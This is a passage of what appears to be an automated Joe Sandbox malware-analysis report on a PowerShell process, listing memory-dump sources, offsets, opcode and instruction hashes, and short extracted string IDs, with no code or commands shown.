                                • Instruction Fuzzy Hash: 80828BB4B00205CFDB14CF58C954A6ABBB3EF95314F24C4A9D805AB395DB36EC46CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq$$]q$$]q
                                • API String ID: 0-1533201563
                                • Opcode ID: 06979c9425e9fdc7847a587ad5f8b0f7cddcfe72d06c3c0989475b3176f155de
                                • Instruction ID: 07d89eeb3fb8385be26d96576a145ff330cd2feaa7dfa8d03db9ecaaab3a5168
                                • Opcode Fuzzy Hash: 06979c9425e9fdc7847a587ad5f8b0f7cddcfe72d06c3c0989475b3176f155de
                                • Instruction Fuzzy Hash: DD226134B012548FCB29DB24C8946AEB7B6FF89304F1585E9D40AAB3A5CF759D81CF80
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q
                                • API String ID: 0-1444653880
                                • Opcode ID: 308588059400140d6277938c2f94243225cec2c67786fceea8f45bdc5a99e63a
                                • Instruction ID: 6aaa8c275a86f92dbd8a0e12a1759f83bb4030425f3dc76742c02562ea683bce
                                • Opcode Fuzzy Hash: 308588059400140d6277938c2f94243225cec2c67786fceea8f45bdc5a99e63a
                                • Instruction Fuzzy Hash: C6A169B17043068FCB159F78885166ABFE6EF96204F1484ABDD41DF2A2DB35EC41C7A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q
                                • API String ID: 0-705557208
                                • Opcode ID: a7b2b59c4ffb8ec3de3b8875ce11f98aa8193d9ace9cb4ed951948664d732a09
                                • Instruction ID: 37a655ed3b0e82e04d1a2a5db9b8b525e50e1d3691ab5e6ddbe785ee0fe379ed
                                • Opcode Fuzzy Hash: a7b2b59c4ffb8ec3de3b8875ce11f98aa8193d9ace9cb4ed951948664d732a09
                                • Instruction Fuzzy Hash: 56B1A9B4B10205CFDB14DF58C550BAABBB2EF98708F51C569D800AF395DB36E846CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: 2e943f684fcb8cb8aba9608d8ace85e74133d57e110b60ade03cc7e54d600f51
                                • Instruction ID: 22ded1db2a6216312b092d78c15b0218f9e64ec3b7236fa18cc2a8b05c02f130
                                • Opcode Fuzzy Hash: 2e943f684fcb8cb8aba9608d8ace85e74133d57e110b60ade03cc7e54d600f51
                                • Instruction Fuzzy Hash: A0413BB6B002199BCB249E79C88076EF7E5EFA5715B14896ACC45EB301DB31DD01C7E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q
                                • API String ID: 0-3120983240
                                • Opcode ID: 1d5094764f0b594e1b96def2db884a7a383600f8439d45e37ae125f489d15d16
                                • Instruction ID: 6361e166e1d0ccbba7a5578e136425098defa52e33a8686a264a2edfca1285c6
                                • Opcode Fuzzy Hash: 1d5094764f0b594e1b96def2db884a7a383600f8439d45e37ae125f489d15d16
                                • Instruction Fuzzy Hash: 11F1BF74A002149FE724DF68C950B6ABBB3EF94304F11C8E5D909AF395CB75ED818BA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: cb6402c506487fc87ab5ea737829ec2a6cd6a760d0f6eabb3c046d6f63132d3d
                                • Instruction ID: e2638a1414a6fbacd83f50bba23431ae67a3f01810b26693848f1f0268e9b0d5
                                • Opcode Fuzzy Hash: cb6402c506487fc87ab5ea737829ec2a6cd6a760d0f6eabb3c046d6f63132d3d
                                • Instruction Fuzzy Hash: 6F21D8FA900619DFCB249E79C5C07A9BBF0AF65324B144595CC88E7201D7309940CBD2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q
                                • API String ID: 0-1259897404
                                • Opcode ID: 3c1607cc0663aa9aaf54b1c13ab6b3aca5e95a81add1cb9105d88538d130ebc5
                                • Instruction ID: 5a4d6d4489b08073a05001c9c243a96ffd194fe04d68ee198e7962482fd90e5f
                                • Opcode Fuzzy Hash: 3c1607cc0663aa9aaf54b1c13ab6b3aca5e95a81add1cb9105d88538d130ebc5
                                • Instruction Fuzzy Hash: 3741E7B1B04206CFDF249F28C540B6ABBE1DFA5219F1880A7DD05DB251D735E941CBA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1518ae1d13eee5269fdfdd91b747f3cd104033882cee460c3a75a9a6b90f72f5
                                • Instruction ID: 45c8c1418075d1b13c5f8dc1f34f28c311aaa7d7542b166356d351192996c644
                                • Opcode Fuzzy Hash: 1518ae1d13eee5269fdfdd91b747f3cd104033882cee460c3a75a9a6b90f72f5
                                • Instruction Fuzzy Hash: 8B224BB4A10205CFD714CF48C585A6ABBB3EF98318F25C1A9D919AB355CB72EC46CB81
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93e022fb918699857fea871ebb6bb7735222ba52d830c6964b15406cb88342eb
                                • Instruction ID: 445276d18daaf3775f3c3677107d5baf79095963e3e7760c7df90c222016652d
                                • Opcode Fuzzy Hash: 93e022fb918699857fea871ebb6bb7735222ba52d830c6964b15406cb88342eb
                                • Instruction Fuzzy Hash: 43F159B4A10205DFD714CF58C585A6ABBB3EF94318F18C0A9E915AF391CB72EC46CB91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 980250a2f2f281f3e549eb8d2d3da132ae4a3fbe212d7fff96608027250a62ed
                                • Instruction ID: a0d8cdd97413296d397c6f985520af15ad6da32da3a63d96b866365b194e7259
                                • Opcode Fuzzy Hash: 980250a2f2f281f3e549eb8d2d3da132ae4a3fbe212d7fff96608027250a62ed
                                • Instruction Fuzzy Hash: C0D14F34A002189FDB05CF99D584A9DFBB2FF88310F198199E545AB3A5CB75ED82CF90
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f40c52ce12a1139b9c94f5e37ed801901eabd5c40f55782a1eb5b832bcd0387
                                • Instruction ID: 7845209445aa507db8c2f7ce46d1d6a7570939bfe180e86f2452dadabbc5a547
                                • Opcode Fuzzy Hash: 6f40c52ce12a1139b9c94f5e37ed801901eabd5c40f55782a1eb5b832bcd0387
                                • Instruction Fuzzy Hash: 7BC19F35A00208CFCB14DFA4D994A9DBBB6FF89310F158599E406AF3A6CB74ED49CB40
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7509fb0285a1606ec569adbb2acf37b9942a514edbb8311765b4a9dcaa931054
                                • Instruction ID: 1e38e684f66c17e69630cf5affa263542b8bbfbe57dab0bfef68ede8ced8a965
                                • Opcode Fuzzy Hash: 7509fb0285a1606ec569adbb2acf37b9942a514edbb8311765b4a9dcaa931054
                                • Instruction Fuzzy Hash: DDB13170E00209DFDB20DFA9D99679DBBF2AF4C314F188129D815E7294EBB49846CF91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db667cc813bf101199774026e753ab232914b2f2004ae97fc34cbfe88c74a194
                                • Instruction ID: 34a36e5d66cb6498cd2b7bc745cfb7353ef550ad95e854c4d6b032a163851901
                                • Opcode Fuzzy Hash: db667cc813bf101199774026e753ab232914b2f2004ae97fc34cbfe88c74a194
                                • Instruction Fuzzy Hash: F9B1B1B0B00204DFDB14DB68C595B6EBBA3EF98314F1188A9D805AF355DB36EC45CBA1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b77e93cf57dc80daa0df079655d083fa2c5f8247d6860ea355c837c3795d9a94
                                • Instruction ID: 346eb5a070a5c6e0f240b435891c2b547bdb304ff806b3634601f88e5a9b0ec4
                                • Opcode Fuzzy Hash: b77e93cf57dc80daa0df079655d083fa2c5f8247d6860ea355c837c3795d9a94
                                • Instruction Fuzzy Hash: 41A15F71E00209DFDF20CFA9D98679DBBF1BF4C314F188129D815A7294EBB49886CB91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dca43bc10134308f6902faf33d4d1936001e58cbd848b983131e9696c881f6a7
                                • Instruction ID: d8773b9a009a4b3dee00b1cd0e842af244b954eaa42c23f1ff53c82a9a2f6989
                                • Opcode Fuzzy Hash: dca43bc10134308f6902faf33d4d1936001e58cbd848b983131e9696c881f6a7
                                • Instruction Fuzzy Hash: DCA19FB0B00205DFDB14DF64C585BAABBB3EF98318F1584A9D805AB351DB36EC45CB61
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 782c4788c2db83acb0452bc47a0b5920cb304c0c297d683d099c2251ca94b9aa
                                • Instruction ID: 70d546944d9f5a04bd41736a620caf7dfc9e7acdb37744fb4c44d5b05778d7c9
                                • Opcode Fuzzy Hash: 782c4788c2db83acb0452bc47a0b5920cb304c0c297d683d099c2251ca94b9aa
                                • Instruction Fuzzy Hash: 7691A430A00244CFCB14DF68D950A9DBBF6EF89314F18C569D419DB6A6DB75EC46CB80
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 91d93b23d84a8dc3901dc21da94828c84eab8bee2fd0fd9a1684bbd00343edad
                                • Instruction ID: a668516845f42000b55f8443fe57c15c862e715195bfd9d95748db7b311250b8
                                • Opcode Fuzzy Hash: 91d93b23d84a8dc3901dc21da94828c84eab8bee2fd0fd9a1684bbd00343edad
                                • Instruction Fuzzy Hash: DF81A034A05244DFCB15DF78D8849ADBBF2FF89214F1984A9D445AB3A2CB75EC85CB10
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3f045b9c6c8febc6ec9c940cbe885ed352a78faea2534ed752a98510b4c7901
                                • Instruction ID: 7b3c67682a135e37435f0defbfa7ca5d7edad1cc1a3182cd029eb8b0850eb5cd
                                • Opcode Fuzzy Hash: f3f045b9c6c8febc6ec9c940cbe885ed352a78faea2534ed752a98510b4c7901
                                • Instruction Fuzzy Hash: 23717A70E00208DFCF14DFA4D990BADBBF6BF88304F148469D412AB2A1DB75AD86CB40
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18c2e26fd4fbf69eccee719bbf36f7a296398c8975435c2c97329c6ef0205258
                                • Instruction ID: 38f2a59f103c66e4ae70b7f80fad7c7fcbb1dcd4c8a5767079a927e16bf6ebb5
                                • Opcode Fuzzy Hash: 18c2e26fd4fbf69eccee719bbf36f7a296398c8975435c2c97329c6ef0205258
                                • Instruction Fuzzy Hash: 24715D70D00249DFDB20DFA9C88279EBBF1AF88714F188129E414AB294DBB49846CF91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ae31d1bd55832626d52dc76d9855a21a21b000544e6e8ecc7b34ecf6dc3fcbdb
                                • Instruction ID: 7e846a9c5bb38a6954619d1dbdac1d6dfc5e72b123e4b1fd030a3527b36fee22
                                • Opcode Fuzzy Hash: ae31d1bd55832626d52dc76d9855a21a21b000544e6e8ecc7b34ecf6dc3fcbdb
                                • Instruction Fuzzy Hash: 3A714D70E00209DFDF24CFA9C99179DBBF2AF88714F188129E415A7294EBB49846CF91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a89ff915992c20c1502d435dc83ebf4861e5c120db90408d03e37f86a78b92cc
                                • Instruction ID: 544522227313626e83371006605a0f13b8edfd12b873bad2b41eddb5e923c474
                                • Opcode Fuzzy Hash: a89ff915992c20c1502d435dc83ebf4861e5c120db90408d03e37f86a78b92cc
                                • Instruction Fuzzy Hash: AE41AEF1700214CBCB199B78849166ABFA6DFE1318B10C5AADD41DF251EA32D902C3E3
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 66debe9b6011b7ecaa0680c5d3c8fcffc9cc440f70679d61df46a84aa5bc5a32
                                • Instruction ID: a0f8e2d5a42f5dd22f254400203ffa155381c682bf7c62c39d933291083d2007
                                • Opcode Fuzzy Hash: 66debe9b6011b7ecaa0680c5d3c8fcffc9cc440f70679d61df46a84aa5bc5a32
                                • Instruction Fuzzy Hash: B941A175B002048FDB18EF64C9A8AADBBB6EF8D710F19406DE506EB7A5CB749C41CB50
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 311f524795d7f7d8694d5169895500ae36e4dd81464880374964ba00d27d4340
                                • Instruction ID: eca0e6779c22a2722d6bcef01125d44f34092ccde0eae177fd9bf2a776d5da64
                                • Opcode Fuzzy Hash: 311f524795d7f7d8694d5169895500ae36e4dd81464880374964ba00d27d4340
                                • Instruction Fuzzy Hash: 8D418F70A00204CFDB14DFA8C994AADFBF6BF89314F148569D046AB3A6DBB4AD45CB40
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bfc20423a698c58eec5b3afe4c63e2301c21423129f517dd4e904fac22a5729f
                                • Instruction ID: 8a5c6519ce93bb75e5bd3887e502910934a4ed34937453345a2cedf00ab405d5
                                • Opcode Fuzzy Hash: bfc20423a698c58eec5b3afe4c63e2301c21423129f517dd4e904fac22a5729f
                                • Instruction Fuzzy Hash: 1641B67490E3955FC702DF2CD9A08DABFB4EF4A210B0541E7D484DB2A3C238D949CBA5
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6fa9b312f02a308a082007be6640a3f10c4a24c36efe84b5d331aa088434859c
                                • Instruction ID: afb47666a49fedc99887b3ebfdf5c1dec290e5d15bf15ad8057642d0c6fde785
                                • Opcode Fuzzy Hash: 6fa9b312f02a308a082007be6640a3f10c4a24c36efe84b5d331aa088434859c
                                • Instruction Fuzzy Hash: 6C319F347502049FE708AB69C955BAE7EB7EF85708F10C464E9017F395CE76EC428BA1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 605a61a8f30c9ac4011b3827932c0e322c8c20069bd570d24b584ac4fd7fed19
                                • Instruction ID: 1930ecaf1b721f7bdc93da1ad4bf333929ae44568f2a1b3ae3a07f846436fbeb
                                • Opcode Fuzzy Hash: 605a61a8f30c9ac4011b3827932c0e322c8c20069bd570d24b584ac4fd7fed19
                                • Instruction Fuzzy Hash: 05218B71300309ABD7285E7E88D0B3BBBD6ABD4706F24882AA906DB3C1DE71D8408371
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca2ad731c82082b04d0c2c474959b3683b9bec734b0e74f98cf744619f5206c3
                                • Instruction ID: fb9cab013504b8e4e88ce6f06764078078aecb2b49e58ab2fe61e369aadb10c6
                                • Opcode Fuzzy Hash: ca2ad731c82082b04d0c2c474959b3683b9bec734b0e74f98cf744619f5206c3
                                • Instruction Fuzzy Hash: 8B314E34A011588FCB25EB24C8546EEB7B2FF89304F1541E9D40AAB355CB759E81DF80
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95cc8617aea8043efadf3b692537c6dba919dd5ff811542c1beec06a539e34f8
                                • Instruction ID: 352f8e9c5091d625a9ab1782999f3537395d8eac9bd54ef1f83f3b3668047229
                                • Opcode Fuzzy Hash: 95cc8617aea8043efadf3b692537c6dba919dd5ff811542c1beec06a539e34f8
                                • Instruction Fuzzy Hash: A8318075A042458FCB01DF58C99499DBBB4FF4A310B1984EAD848EB393D735EC46CBA1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8ec6d31e7094ae563d25fbc8d3613050beccbc22daf2903151e20b21c7816f78
                                • Instruction ID: 63e51d990845b3a17da5068ad5cf80c49df056b00ca54fd4189336129ae09532
                                • Opcode Fuzzy Hash: 8ec6d31e7094ae563d25fbc8d3613050beccbc22daf2903151e20b21c7816f78
                                • Instruction Fuzzy Hash: A8218B71304385ABD7140E7A899077A7BE19FA5715F2484A2ED41DB2D2DB78DD808371
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efd385ff97e44e9370cac513c84b083acf2d07af705c75b27e54773b05377bb2
                                • Instruction ID: 3bec493fc6ed9d3cff17703c4ee37558a740a5291ca3229f78e4c00f8d5c1e91
                                • Opcode Fuzzy Hash: efd385ff97e44e9370cac513c84b083acf2d07af705c75b27e54773b05377bb2
                                • Instruction Fuzzy Hash: 0501F77630021A9BCB245D7AE400576BB99DFE1322F14C43BDD49C7251EA36D845C7A1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 34c31b001d12d40ac04dc03439ea6466a11f66918b716ce44df9b3e16e306716
                                • Instruction ID: 3da8faf1b4bbaf96c897397f795c9707d9cb37f3399b35cddce5571d4db62729
                                • Opcode Fuzzy Hash: 34c31b001d12d40ac04dc03439ea6466a11f66918b716ce44df9b3e16e306716
                                • Instruction Fuzzy Hash: 11118070D04249CBDF34EA94D59A7ECB7B2AB4D319F18146AC001BA1E0EBB458CBCB16
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031238895.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cec01e8048789695840e8d0bcf1f512d3650b061226f33f5dabae1c8d9336d85
                                • Instruction ID: 36d4c1f36c7337aa77a514038aa8e026ce7437c1b65e4233a889e2985e36f087
                                • Opcode Fuzzy Hash: cec01e8048789695840e8d0bcf1f512d3650b061226f33f5dabae1c8d9336d85
                                • Instruction Fuzzy Hash: F001F231406340AEE721CA29C984B77FFDCEF46324F1CC86AED480A246C2799851CAB1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031238895.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d486002e81d2eb8aab8ff9aa5de5f558a46394e8551817d1897031c11148387
                                • Instruction ID: 4c9a7a0fd8d63a6ae2275eb5129bb125c57cc6c1c4b3a83d8de72bb7ed41a78f
                                • Opcode Fuzzy Hash: 2d486002e81d2eb8aab8ff9aa5de5f558a46394e8551817d1897031c11148387
                                • Instruction Fuzzy Hash: BFF0C271405344AEE7118A1AC884B62FFDCEF42234F18C45AED480A286C279A844CAB1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 65c168048d0e4a2e7942b6ebcbc87c0a9aebdcfd2ee56119c02d7e5218574d87
                                • Instruction ID: fa1be07a7eaf89a7656910b324cabf4573fa50ffa00efe53ac2488e28497e87b
                                • Opcode Fuzzy Hash: 65c168048d0e4a2e7942b6ebcbc87c0a9aebdcfd2ee56119c02d7e5218574d87
                                • Instruction Fuzzy Hash: 89F03075A001049FCB14CB99D8845AAF7B5FF88210B249599D999A3651CB36AC53CB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031576906.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_3100000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3b394db50a834a9ec5f19c16bde678f9c720b88ba6be81ce296d3be43e3b853
                                • Instruction ID: 11054144c4afdbfa3d8c19568c17b4fae8c0e1975cebd619cf124234b30f37fe
                                • Opcode Fuzzy Hash: a3b394db50a834a9ec5f19c16bde678f9c720b88ba6be81ce296d3be43e3b853
                                • Instruction Fuzzy Hash: 41F0B235A001099FCB15CB9DD990AEEF7B1FF88324F248159E525A72A1C732E852CB60
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3cc292e8fca9bfa38efbfff74178bb9b30797d3d910a7384620a8594a28e3bb9
                                • Instruction ID: 44484efa3c117d3b0d8f74b91dd5bdb2cf665cb5e05ec7dd5d014284714d4be4
                                • Opcode Fuzzy Hash: 3cc292e8fca9bfa38efbfff74178bb9b30797d3d910a7384620a8594a28e3bb9
                                • Instruction Fuzzy Hash: 06E06DA060C3808FD30A8B609894820BF31AFA714871EC1CAD4888B5A3C5669803D712
                                Memory Dump Source
                                • Source File: 00000004.00000002.3031238895.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03bceb40c2e5e2b72634917fd71f24085bf839ea409667732cfef4244afc790a
                                • Instruction ID: 4f5560f745bf426f433f09a695b534541afdf7f1529f5f91b04117b1a940aed3
                                • Opcode Fuzzy Hash: 03bceb40c2e5e2b72634917fd71f24085bf839ea409667732cfef4244afc790a
                                • Instruction Fuzzy Hash: F6212871505200DFCB05CF14D9C0F3ABFA9FB88318F24C5A9E9090B25AC33AD426CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-267665775
                                • Opcode ID: 2c2c6a6c5612ff4e553d26ba5704da3fc3767cc85ddf03123ed05f68d9d833dd
